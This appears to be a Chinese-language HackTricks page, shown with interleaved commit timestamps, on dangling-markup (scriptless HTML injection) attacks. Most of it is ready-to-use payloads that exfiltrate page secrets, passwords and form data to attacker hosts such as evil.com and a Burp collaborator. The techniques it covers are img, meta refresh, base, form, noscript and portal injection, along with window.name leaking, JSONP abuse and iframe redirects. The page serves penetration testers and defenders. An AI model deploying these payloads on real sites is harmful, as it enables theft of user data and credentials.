2024-02-05 20:18:17 +00:00
# 悬挂标记 - HTML无脚本注入
2023-08-24 09:57:53 +00:00
< details >
2024-02-05 20:18:17 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2023-08-24 09:57:53 +00:00
2024-01-02 22:21:01 +00:00
支持HackTricks的其他方式:
2024-02-05 20:18:17 +00:00
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[NFTs的收藏品**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群组** ](https://t.me/peass ) 或 **关注**我的 **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2023-08-24 09:57:53 +00:00
< / details >
2024-02-05 20:18:17 +00:00
## 简介
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
当发现**HTML注入**时,此技术可用于从用户那里提取信息。如果您**找不到利用**[**XSS**](../xss-cross-site-scripting/)的方法,但可以**注入一些HTML标记**,这将非常有用。\
如果某些**秘密以明文保存**在HTML中, 您想要**从客户端中提取**它,或者您想要误导某些脚本执行,这也很有用。
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
这里讨论的几种技术可以用于通过意想不到的方式( html标记、CSS、http-meta标记、表单、base等) 窃取信息, 从而绕过一些[**内容安全策略**](../content-security-policy-csp-bypass/)。
2023-08-24 09:57:53 +00:00
## 主要应用
### 窃取明文秘密
2024-02-05 20:18:17 +00:00
如果您注入 `<img src='http://evil.com/log.cgi?` ,当页面加载时,受害者将向您发送注入的`img`标记和代码中下一个引号之间的所有代码。如果某个秘密恰好位于该块中,您将窃取它(您也可以使用双引号执行相同操作,请查看哪种更有趣)。
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
如果`img`标记被禁止( 例如由于CSP) , 您还可以使用 `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?` 。
```html
2023-08-24 09:57:53 +00:00
< img src = 'http://attacker.com/log.php?HTML=
< meta http-equiv = "refresh" content = '0; url = http://evil.com/log.php?text=
< meta http-equiv = "refresh" content = '0;URL=ftp://evil.com?a=
```
2024-02-05 20:18:17 +00:00
请注意,**Chrome会阻止包含"< "或"\n"的HTTP URL**,因此您可以尝试其他协议方案,如"ftp"。
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
您还可以滥用CSS `@import` (将发送直到找到";"为止的所有代码)。
```html
2023-08-24 09:57:53 +00:00
< style > @ i m p o r t / / h a c k v e r t o r . c o . u k ? < - - - I n j e c t e d
< b > steal me!< / b > ;
```
2024-02-05 20:18:17 +00:00
您也可以使用**`< table ` * * :
```html
2023-08-24 09:57:53 +00:00
< table background = '//your-collaborator-id.burpcollaborator.net?'
```
2024-02-05 20:18:17 +00:00
你还可以插入一个`< base ` 标签 。 所有信息将被发送直到引号关闭 , 但这需要一些用户交互 ( 用户必须点击某个链接 , 因为base标签会改变链接指向的域 ) :
```html
2023-08-24 09:57:53 +00:00
< base target = ' < --- Injected
steal me'< b > test< / b >
```
2024-01-02 22:21:01 +00:00
### 窃取表单
2024-02-05 20:18:17 +00:00
```html
2023-08-24 09:57:53 +00:00
< base href = 'http://evil.com/' >
```
2024-02-05 20:18:17 +00:00
然后,发送数据到路径的表单(如`< form action = 'update_profile.php' > `)将会发送数据到恶意域。
2023-08-24 09:57:53 +00:00
2024-01-02 22:21:01 +00:00
### 窃取表单 2
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
设置一个表单头部:`< form action = 'http://evil.com/log_steal' > ` 这将覆盖下一个表单头部,表单中的所有数据将被发送给攻击者。
2023-08-24 09:57:53 +00:00
2024-01-02 22:21:01 +00:00
### 窃取表单 3
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
按钮可以使用属性"formaction"来更改表单信息将被发送到的URL:
```html
2023-08-24 09:57:53 +00:00
< button name = xss type = submit formaction = 'https://google.com' > I get consumed!
```
2024-02-05 20:18:17 +00:00
### 窃取明文密码 2
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
使用最新提到的技术来窃取表单(注入新表单头部),然后可以注入一个新的输入字段:
```html
2023-08-24 09:57:53 +00:00
< input type = 'hidden' name = 'review_body' value = "
```
2024-02-05 20:18:17 +00:00
这个输入字段将包含 HTML 中双引号之间以及下一个双引号之间的所有内容。这种攻击将"_**窃取明文密码**_"与"_**窃取表单2**_"混合在一起。
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
您可以通过注入一个表单和一个`< option > `标签来执行相同的操作。直到找到闭合的`< / option > `为止的所有数据将被发送:
```html
2023-08-24 09:57:53 +00:00
< form action = http://google.com > < input type = "submit" > Click Me< / input > < select name = xss > < option
```
### 表单参数注入
2024-02-05 20:18:17 +00:00
您可以更改表单的路径并插入新值,从而执行意外操作:
```html
2023-08-24 09:57:53 +00:00
< form action = '/change_settings.php' >
< input type = 'hidden' name = 'invite_user'
value='fredmbogo'> ← Injected lines
< form action = "/change_settings.php" > ← Existing form (ignored by the parser)
...
< input type = "text" name = "invite_user" value = "" > ← Subverted field
...
< input type = "hidden" name = "xsrf_token" value = "12345" >
...
< / form >
```
2024-02-05 20:18:17 +00:00
### 通过noscript窃取明文密码
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
`<noscript></noscript>` 是一个标签, 如果浏览器不支持JavaScript, 其内容将被解释( 您可以在Chrome中的[chrome://settings/content/javascript](chrome://settings/content/javascript)中启用/禁用JavaScript) 。
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
从注入点到底部将网页内容导出到攻击者控制的站点的一种方法是注入以下内容:
```html
2023-08-24 09:57:53 +00:00
< noscript > < form action = http://evil.com > < input type = submit style = "position:absolute;left:0;top:0;width:100%;height:100%;" type = submit value = "" > < textarea name = contents > < / noscript >
```
2024-02-05 20:18:17 +00:00
### 通过用户交互绕过 CSP
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
从这个[portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)中,你可以了解到即使在**最严格的 CSP 环境**中,仍然可以通过一些**用户交互**来**外泄数据**。在这种情况下,我们将使用以下有效载荷:
```html
2023-08-24 09:57:53 +00:00
< a href = http://attacker.net/payload.html > < font size = 100 color = red > You must click me< / font > < / a >
< base target = '
```
2024-02-05 20:18:17 +00:00
请注意,您将要求**受害者**点击一个链接,该链接将将**重定向**他到您控制的**有效负载**。还要注意,**`base`**标签中的**`target`**属性将包含**HTML内容**,直到下一个单引号。\
这将导致如果点击链接,**`window.name`**的**值**将是所有该**HTML内容**。因此,由于您**控制**受害者通过点击链接访问的页面,您可以访问**`window.name`**并**外泄**这些数据:
```html
2023-08-24 09:57:53 +00:00
< script >
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
< / script >
```
2024-02-05 20:18:17 +00:00
### 误导性脚本工作流程 1 - HTML 命名空间攻击
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
在 HTML 中插入一个带有 id 的新标签,该标签将覆盖下一个标签,并具有一个将影响脚本流程的值。在此示例中,您正在选择要共享信息的对象:
```html
2023-08-24 09:57:53 +00:00
< input type = 'hidden' id = 'share_with' value = 'fredmbogo' > ← Injected markup
...
Share this status update with: ← Legitimate optional element of a dialog
< input id = 'share_with' value = '' >
...
function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}
```
2024-02-05 20:18:17 +00:00
### 误导性脚本工作流 2 - 脚本命名空间攻击
2023-08-24 09:57:53 +00:00
2024-01-02 22:21:01 +00:00
通过插入HTML标签在javascript命名空间内创建变量。然后, 这个变量将影响应用程序的流程:
2024-02-05 20:18:17 +00:00
```html
2023-08-24 09:57:53 +00:00
< img id = 'is_public' > ← Injected markup
...
// Legitimate application code follows
function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC) ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}
function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC; ← Condition always evaluates to true
...
}
```
2024-01-02 22:21:01 +00:00
### 滥用 JSONP
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
如果你发现了一个 JSONP 接口,你可以调用任意函数并传入任意数据:
```html
2023-08-24 09:57:53 +00:00
< script src = '/editor/sharing.js' > : ← L e g i t i m a t e s c r i p t
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}
< script src = '/search?q=a&call=set_sharing' > : ← I n j e c t e d J S O N P c a l l
set_sharing({ ... })
```
2024-02-05 20:18:17 +00:00
或者你甚至可以尝试执行一些 JavaScript:
```html
2023-08-24 09:57:53 +00:00
< script src = '/search?q=a&call=alert(1)' > < / script >
```
2024-01-02 22:21:01 +00:00
### Iframe 滥用
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
子文档具有查看和修改其父文档的 `location` 属性的能力,即使在跨源情况下也是如此。这允许在 **iframe** 中嵌入一个脚本,可以将客户端重定向到任意页面:
```html
2023-08-24 09:57:53 +00:00
< html > < head > < / head > < body > < script > top . window . location = "https://attacker.com/hacked.html" < / script > < / body > < / html >
```
2024-02-05 20:18:17 +00:00
这可以通过类似以下方式来减轻风险:`sandbox=' allow-scripts allow-top-navigation'`
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
一个iframe也可以被滥用来从不同页面泄露敏感信息, **利用iframe的name属性**。这是因为你可以创建一个iframe, 它会通过滥用HTML注入来将**敏感信息显示在iframe的name属性中**, 然后从初始iframe访问该名称并泄露信息。
2023-08-24 09:57:53 +00:00
```html
< script >
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
< / script >
< iframe src = "//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload = "cspBypass(this.contentWindow)" > < / iframe >
```
2024-02-05 20:18:17 +00:00
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes ](https://portswigger.net/research/bypassing-csp-with-dangling-iframes )
2023-08-24 09:57:53 +00:00
### \<meta 滥用
2024-02-05 20:18:17 +00:00
您可以使用 ** `meta http-equiv` ** 执行**多个操作**,如设置 Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向(在此情况下为 5 秒): `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
这可以通过关于 **http-equiv** 的 **CSP** 来**避免**( `Content-Security-Policy: default-src 'self';` , 或 `Content-Security-Policy: http-equiv 'self';` )
2023-08-24 09:57:53 +00:00
### 新的 \<portal HTML 标签
2024-02-05 20:18:17 +00:00
您可以在这里找到关于 \<portal 标签可利用漏洞的非常 **有趣的研究** [here ](https://research.securitum.com/security-analysis-of-portal-element/ )。\
在撰写本文时,您需要在 Chrome 中启用 portal 标签 `chrome://flags/#enable-portals` ,否则它将无法正常工作。
```html
2023-08-24 09:57:53 +00:00
< portal src = 'https://attacker-server?
```
2024-02-05 20:18:17 +00:00
### HTML泄漏
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
并非所有在HTML中泄漏连接的方法都对悬挂标记有用, 但有时可能会有帮助。在这里检查它们: [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)
2023-08-24 09:57:53 +00:00
2024-01-02 22:21:01 +00:00
## SS-Leaks
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
这是**悬挂标记和XS-Leaks的混合**。一方面,该漏洞允许在我们将要攻击的**同源页面**中**注入HTML**( 但不包括JS) 。另一方面, 我们不会直接攻击可以注入HTML的页面, 而是**另一个页面**。
2023-08-24 09:57:53 +00:00
{% content-ref url="ss-leaks.md" %}
[ss-leaks.md ](ss-leaks.md )
{% endcontent-ref %}
## XS-Search/XS-Leaks
2024-02-05 20:18:17 +00:00
XS-Search旨在利用**侧信道攻击**来**窃取跨源信息**。因此, 这是一种与悬挂标记不同的技术, 然而, 一些技术滥用了包含HTML标记( 带有和不带有JS执行) 的方式, 比如[**CSS注入**](../xs-search.md#css-injection)或[**延迟加载图像**](../xs-search.md#image-lazy-loading)**。**
2023-08-24 09:57:53 +00:00
{% content-ref url="../xs-search.md" %}
[xs-search.md ](../xs-search.md )
{% endcontent-ref %}
## 暴力破解检测列表
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}
## 参考资料
2024-02-05 20:18:17 +00:00
* [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057 ](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057 )
* [http://lcamtuf.coredump.cx/postxss/ ](http://lcamtuf.coredump.cx/postxss/ )
* [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/ ](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/ )
* [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup ](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup )
2023-08-24 09:57:53 +00:00
< details >
2024-02-05 20:18:17 +00:00
< summary > < strong > 从零开始学习AWS黑客技术, 成为专家< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2024-01-02 22:21:01 +00:00
2024-02-05 20:18:17 +00:00
支持HackTricks的其他方式:
2023-08-24 09:57:53 +00:00
2024-02-05 20:18:17 +00:00
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群** ](https://discord.gg/hRep4RUj7f ) 或 [**电报群** ](https://t.me/peass ) 或在**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/carlospolopm )**上关注**我。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
2023-08-24 09:57:53 +00:00
< / details >